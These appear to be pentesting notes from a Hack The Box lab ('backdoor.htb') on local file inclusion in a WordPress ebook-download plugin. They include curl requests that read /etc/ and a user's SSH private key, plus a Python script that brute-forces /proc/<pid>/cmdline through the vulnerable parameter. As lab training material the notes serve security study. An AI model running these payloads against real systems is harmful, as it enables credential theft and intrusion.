LFI (Proc Logs) - Pentesting Web
Exploitation LFI
http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/

LFI - Proc

curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa"
curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa.pub"
#!/usr/bin/python3
from pwn import *
import requests, signal, time, pdb
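def def_handler(sig, frame):
    """Handle SIGINT: print an exit message and terminate with status 1.

    Args:
        sig: Signal number passed in by the ``signal`` module (unused).
        frame: Current stack frame passed in by the ``signal`` module (unused).

    Raises:
        SystemExit: Always, with exit code 1.
    """
    # Imported here so the handler does not depend on ``from pwn import *``
    # happening to re-export ``sys``; the file never imports it explicitly.
    import sys

    print("\n\n[+]] Exiting...\n")
    sys.exit(1)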
# Base URL of the file-download endpoint; the path to read is appended to it.
main_url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="

# Route Ctrl+C (SIGINT) to def_handler.
signal.signal(signal.SIGINT, def_handler)
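def makeRequest():
    """Probe /proc/<pid>/cmdline for PIDs 1-999 through the file-download parameter.

    Each PID is requested as ``main_url + "/proc/<pid>/cmdline"``; any response
    body longer than 82 bytes is printed together with its length. Every probe
    is an ordinary GET with the /proc path in the query string, so the whole
    sweep is visible in the web server's access log.

    A request that fails or times out is reported and skipped, so one bad
    response does not abort the loop.
    """
    # /proc/PID/cmdline
    p1 = log.progress("Brute Force Attack")
    p1.status("Starting Brute Force Attack")
    sleep(2)

    for i in range(1, 1000):
        p1.status("Trying with PATH /proc/%s/cmdline" % str(i))
        url = main_url + "/proc/" + str(i) + "/cmdline"

        try:
            # requests has no default timeout; without one a single stalled
            # connection would block the loop indefinitely.
            r = requests.get(url, timeout=10)
        except requests.RequestException as err:
            log.warning("Request for /proc/%s/cmdline failed: %s" % (str(i), err))
            continue

        # NOTE(review): 82 looks like the size of the response returned for a
        # missing or empty file — confirm against the target, since that
        # baseline may vary with the length of the requested path.
        if len(r.content) > 82:
            print("-------------------------------------------------------------------------------------")
            log.info("PATH: /proc/%s/cmdline" % str(i))
            log.info("Total length: %s" %len(r.content))
            print(r.content)
            print("-------------------------------------------------------------------------------------")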
# Run the sweep only when executed as a script, not on import.
if __name__ == "__main__":
    makeRequest()